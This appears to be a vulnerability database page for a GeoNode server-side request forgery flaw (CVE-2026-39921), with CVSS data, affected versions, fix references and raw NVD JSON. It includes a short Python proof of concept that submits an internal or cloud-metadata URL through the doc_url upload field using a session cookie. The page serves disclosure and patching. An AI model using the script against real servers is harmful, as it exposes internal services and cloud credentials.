CVE-2026-39921

Description

GeoNode versions 4.0 before 4.4.5 and 5.0 before 5.0.2 contain a server-side request forgery vulnerability that allows authenticated users with document upload permissions to trigger arbitrary outbound HTTP requests by providing a malicious URL via the doc_url parameter during document upload. Attackers can supply URLs pointing to internal network targets, loopback addresses, RFC1918 addresses, or cloud metadata services to cause the server to make requests to internal resources without SSRF mitigations such as private IP filtering or redirect validation.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:geosolutionsgroup:geonode:*:*:*:*:*:*:*:* - VULNERABLE

GeoNode 4.0 < 4.4.5

GeoNode 5.0 < 5.0.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_ssrf(target_url, session_cookie, internal_url):
    """
    PoC for GeoNode CVE-2026-39921 SSRF
    """
    upload_endpoint = f"{target_url}/documents/upload/"
    
    # Headers simulating an authenticated user
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Cookie": f"sessionid={session_cookie}"
    }
    
    # Payload containing the internal resource URL
    # Example: http://169.254.169.254/latest/meta-data/ for cloud metadata
    data = {
        "doc_url": internal_url
    }
    
    try:
        response = requests.post(upload_endpoint, headers=headers, data=data)
        print(f"[+] Request sent to {upload_endpoint}")
        print(f"[+] Target URL: {internal_url}")
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Body: {response.text[:500]}") # Truncated for readability
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "http://localhost:8000" # Replace with target GeoNode instance
    session = "valid_session_id_here" # Replace with valid authenticated session
    payload_url = "http://127.0.0.1:80" # Internal target
    exploit_ssrf(target, session, payload_url)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-39921
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-39921
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-39921/
[4] VulDB https://vuldb.com/cve/CVE-2026-39921
[5] https://github.com/GeoNode/geonode/commit/4a852cfc1da732b10779b5bf5f087c8f02985571
[6] https://github.com/GeoNode/geonode/commit/9856cb5ab27e33c0adba9274f4cccf6d1f534bd1
[7] https://github.com/GeoNode/geonode/pull/14058
[8] https://github.com/GeoNode/geonode/releases/tag/4.4.5
[9] https://github.com/GeoNode/geonode/releases/tag/5.0.2
[10] https://www.vulncheck.com/advisories/geonode-ssrf-via-document-upload

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-39921", "sourceIdentifier": "[email protected]", "published": "2026-04-10T20:16:22.083", "lastModified": "2026-04-16T01:16:09.877", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "GeoNode versions 4.0 before 4.4.5 and 5.0 before 5.0.2 contain a server-side request forgery vulnerability that allows authenticated users with document upload permissions to trigger arbitrary outbound HTTP requests by providing a malicious URL via the doc_url parameter during document upload. Attackers can supply URLs pointing to internal network targets, loopback addresses, RFC1918 addresses, or cloud metadata services to cause the server to make requests to internal resources without SSRF mitigations such as private IP filtering or redirect validation."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:geosolutionsgroup:geonode:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.4.5", "matchCriteriaId": "63411221-3957-4534-967C-B76A963F1A8B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:geosolutionsgroup:geonode:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.2", "matchCriteriaId": "D170633C-B353-4CEA-A77E-3477016B5B98"}]}]}], "references": [{"url": "https://github.com/GeoNode/geonode/commit/4a852cfc1da732b10779b5bf5f087c8f02985571", "source": "[email protected]"}, {"url": "https://github.com/GeoNode/geonode/commit/9856cb5ab27e33c0adba9274f4cccf6d1f534bd1", "source": "[email protected]"}, {"url": "https://github.com/GeoNode/geonode/pull/14058", "source": "[email protected]"}, {"url": "https://github.com/GeoNode/geonode/releases/tag/4.4.5", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/GeoNode/geonode/releases/tag/5.0.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/geonode-ssrf-via-document-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}